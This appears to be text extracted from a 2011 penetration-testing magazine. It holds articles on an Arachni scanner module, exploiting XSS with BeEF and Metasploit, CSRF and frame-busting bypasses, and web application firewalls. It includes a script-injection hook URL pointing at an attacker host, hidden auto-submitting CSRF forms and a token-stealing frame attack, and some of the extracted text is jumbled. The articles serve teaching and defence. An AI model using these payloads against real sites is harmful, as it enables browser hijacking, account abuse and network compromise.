If there is a directory that needed to be protected and you forgot to do so, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
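The two steps above can be sketched as a small Ruby helper. The path follows the external-file convention described earlier; the helper name itself is mine, not part of Arachni:

```ruby
require 'fileutils'

# Hypothetical helper: drop the SVNDigger wordlist where the new
# svn_digger_dirs.rb module will look for it, per the external-file
# convention (modules/recon/<module_name>/).
def install_wordlist(source_tree, wordlist_path)
  dest = File.join(source_tree, 'modules', 'recon', 'svn_digger_dirs')
  FileUtils.mkdir_p(dest)                        # create the module's data directory
  FileUtils.mv(wordlist_path, dest)              # move all-dirs.txt into place
  File.join(dest, File.basename(wordlist_path))  # return the final location
end
```

In practice you would call install_wordlist from the root of your Arachni source tree, pointing it at the all-dirs.txt file extracted from the SVNDigger archive.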
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as shown in Listing 3.
The code does not need a lot of explanation: it checks whether or not a specific directory exists; if it does, it forwards the name to the Arachni Trainer (which will include the directory in further scans) and creates a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:
• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).

Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support
This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company, Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup; this shows that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would operate in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this:
HTML Page:

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search"></INPUT>
<INPUT TYPE="submit" name="Submit" value="Submit"></INPUT>
</FORM>
</BODY>
</HTML>
XSS, BeEF, Metasploit Exploitation
Figure 2. BeEF after configuration
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is limited only by the potency of the attacker's JavaScript code.

Figure 1. User enters in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of clicking on a link which generates a popup box, the user will be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src='http://192.168.56.101/beef/hook/beefmagic.js.php'></script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules > Alert Dialog. This will result in a little popup box on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5).
So as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server-Side PHP Code:

<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of simple text, the attacker enters a snippet of JavaScript into the box, the JavaScript will execute on the user's machine rather than being displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1).
BeEF: Hook the user's browser
Now while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been completely rewritten and has many more features. For now though, extract BeEF from the tarball and copy it into your web server directory
Figure 3. Connection with the BeEF controller
Figure 4. What the attacker will see
Figure 5. What the victim will see
Figure 6. Defacing the current Web Page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten in the victim's browser with the text in the DEFACE STRING box. Try it out (Figure 6).

Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).

Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user's browser
Figure 8. Starting Metasploit
Figure 9. The jobs command
Figure 10. Metasploit after clicking Send Now
Figure 11. Meterpreter window - screenshot 1
Figure 12. Meterpreter window - screenshot 2
Now first ensure that the zombie is still connected. Then click on Standard Modules > Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check whether BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the selected exploit (in this case the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, such as Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install them on it. We can then use these to port-scan an entire internal network or search for vulnerabilities in other services running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:

Figure 13. Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output as in a) must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for the same.
• White-list and black-list filtering can also be used to completely disallow specific characters in user input fields.
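The article's examples are PHP, but encode-on-output is language-independent. As a sketch, here is what it looks like in Ruby using the standard library's CGI.escapeHTML (the variable names are mine):

```ruby
require 'cgi'

payload = "<script>alert(document.domain)</script>"

# Encoding on output turns markup metacharacters into entities,
# so the browser renders the payload as text instead of executing it.
safe_output = CGI.escapeHTML(payload)
puts safe_output
# => &lt;script&gt;alert(document.domain)&lt;/script&gt;
```

The same rule applies to every sink: encode at the point where user-controlled data is written into HTML, not at the point where it is read.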
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email: arvinddoraiswamy@gmail.com
LinkedIn: http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings: http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: when an evil website posts a new status to your Twitter account while your Twitter login session is still active.

CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).

Useless Defenses
The following are the weak defenses:
• Only accept POST: this stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking: some users prohibit referrers, so you cannot simply require referrer headers. Techniques exist to selectively create HTTP requests without referrers.
• Requiring multi-step transactions: CSRF attacks can simply perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from a CAPTCHA image every time he submits a form might make users stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011

Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.
Listing 1. HTML code used to bypass protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame" method="POST">
<input type="text" name="message" value="I like www.evil.com">
<input type="submit">
</form>
<script>document.Form.submit();</script>
</div>
index.php (Victim website)

And the webpage which processes the request and stores the message only if the given token is correct:

post.php (Victim website)

In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario: Listing 4.

index.php (Evil website)
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'

var token = window.frames[0].document.forms['messageForm'].token.value;
Browser settings are not hard to modify, so the best approach to web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:

<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>
A FrameKiller consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, so they can be compared after the form is submitted.
Mechanisms used to subvert one-time tokens usually rely on brute-force attacks. Brute forcing one-time tokens is worthwhile to an attacker only if the mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
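The md5(uniqid(rand(), TRUE)) recipe above was common at the time; a sketch of the same idea using a cryptographically secure random source and a constant-time comparison (written here in Ruby; the helper names are mine) looks like this:

```ruby
require 'securerandom'

# Generate an unpredictable one-time token; it would be stored in the
# session and embedded in the form's hidden field.
def new_token
  SecureRandom.hex(32)  # 64 hex characters from a CSPRNG
end

# Compare the session token with the submitted one in constant time,
# so the check does not leak how many leading characters matched.
def tokens_match?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.reduce(0, :|).zero?
end
```

The constant-time comparison matters because a naive == that returns early on the first mismatching byte can, in principle, leak token prefixes through response timing.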
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token: Listing 2.
Listing 2. Wrong token

<?php session_start();?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token;?>">
</form>
</body>
</html>
Listing 3. Correct token

<?php
session_start();
if ($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, "$message\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:

top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.

Method 1:
<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2: Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
The best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker browses the webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvel.gevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company, and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006. Then he seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks, such as XSS (Cross-Site Scripting), SQL Injection and CSRF (Cross-Site Request Forgery). Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF), http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting): http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com">
<input type="hidden" name="token" value="">
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.
In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms, up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios through which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross-Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: attackers have started to combine these methods more often in order to achieve even higher success rates. And it is no longer just the large corporations that are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify – with high efficiency – as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications that give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would then also have to raise the security of older web applications to the required standard retroactively.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that until now has not processed its inputs and outputs via centralized interfaces is to be enhanced so that the data can be checked. It is then not sufficient to just add new functions. The developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not use only the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
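The usual remedy for the Session Fixation problem mentioned above is to rotate the session ID at the moment of login, so that an ID planted by an attacker before authentication becomes worthless. A minimal sketch in Python; the in-memory session table and function names are hypothetical:

```python
import secrets

# Illustrative session table: session_id -> authenticated user (None before login).
sessions = {}

def new_session():
    """Create an anonymous, pre-login session."""
    sid = secrets.token_hex(16)
    sessions[sid] = None
    return sid

def login(old_sid, user):
    """Rotate the session ID on login so a fixated pre-login ID becomes useless."""
    sessions.pop(old_sid, None)        # invalidate the ID an attacker may know
    fresh_sid = secrets.token_hex(16)  # issue a brand-new ID post-authentication
    sessions[fresh_sid] = user
    return fresh_sid

pre_login = new_session()              # an attacker could have fixated this ID
post_login = login(pre_login, "alice")
print(pre_login in sessions)           # the fixated ID no longer works
print(sessions[post_login])            # the fresh ID carries the logged-in user
```

The point is simply that authentication state is never attached to an ID that existed before the credentials were checked.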
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity as to whether and to what extent the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program has ever gone into productive operation free of errors or weak spots. The shortcomings are frequently uncovered only over time, and by then correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority. The more safely a web application is written, the less improvement work is needed and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection Systems (IDS), a WAF checks the communications at the application level. Normally the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic: it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which as the first security layer considerably minimizes the risk of attacks on any weak spots.
After introducing a WAF it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused through SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application. If a WAF is deployed as a protective system, it can be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; this would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context too, penetration tests make an important contribution to increasing web application security.
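To illustrate why filtering inverted commas is only a stopgap: the root-cause fix inside the application is a parameterized query, which keeps user input out of the SQL grammar entirely. A minimal sketch using Python's built-in sqlite3 module; the table and the payload are invented for the example:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.execute("INSERT INTO users VALUES ('alice')")

hostile = "' OR '1'='1"  # classic quote-based injection payload

# A quote-stripping WAF rule would also mangle legitimate input like O'Brien.
# The parameterized query treats the payload purely as data, never as SQL.
rows = conn.execute(
    "SELECT name FROM users WHERE name = ?", (hostile,)
).fetchall()
print(rows)  # the payload matches nothing
```

Here the WAF rule and the parameterized query address the same symptom at different layers; the article's point stands that the WAF is the cheaper retrofit, while the query change is the durable fix.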
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes for several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAF filters the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. In this way the length and the contents of parameters can also be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and permitted value range.
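The parameter rules described above (expected parameter count, maximum length, permitted characters) amount to a small positive-security check. A sketch in Python; the rule set and names are hypothetical, not a real WAF configuration:

```python
import re

# Hypothetical positive-security rules for one monitored form:
# parameter name -> (maximum length, permitted character pattern).
RULES = {
    "user":   (32, re.compile(r"^[A-Za-z0-9_]+$")),
    "amount": (10, re.compile(r"^[0-9]+$")),
}

def check_request(params):
    """Reject unexpected parameters, over-long values, and invalid characters."""
    if set(params) - set(RULES):  # more (or other) parameters than defined
        return False
    for name, value in params.items():
        max_len, pattern = RULES[name]
        if len(value) > max_len or not pattern.match(value):
            return False
    return True

print(check_request({"user": "bob", "amount": "100"}))              # conforms
print(check_request({"user": "bob", "amount": "1 OR 1=1"}))         # bad characters
print(check_request({"user": "bob", "amount": "1", "debug": "1"}))  # extra parameter
```

Even this tiny rule set already blocks the three-parameter request and the out-of-charset value from the examples in the text.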
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access rates with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks. Furthermore, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2. An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can – to a certain extent – automatically prevent malicious code from reaching the browser if, for example, a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, however, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
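A toy version of such a learning mode might look like the following; a real WAF profiler is far more elaborate (it also learns lengths, types and value ranges), and all URLs and names here are illustrative:

```python
from collections import defaultdict

# Toy "learning mode": observe known-good traffic, then enforce the whitelist.
profile = defaultdict(set)

def learn(url, params):
    """Record the URL and its parameter names as acceptable."""
    profile[url] |= set(params)

def enforce(url, params):
    """Allow only learned URLs carrying only learned parameter names."""
    return url in profile and set(params) <= profile[url]

# Learning phase over traffic assumed to be legitimate.
learn("/order", {"item": "42", "qty": "1"})
learn("/search", {"q": "books"})

print(enforce("/order", {"item": "7"}))                # learned URL and parameter
print(enforce("/order", {"item": "7", "debug": "1"}))  # unknown parameter
print(enforce("/admin", {}))                           # URL never seen in learning
```

The sketch also makes the article's maintenance point visible: any new page or parameter added to the application is rejected until it is re-learned.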
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that are possible violations of the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks – even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Special functions are only available here: as a Full Reverse Proxy a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
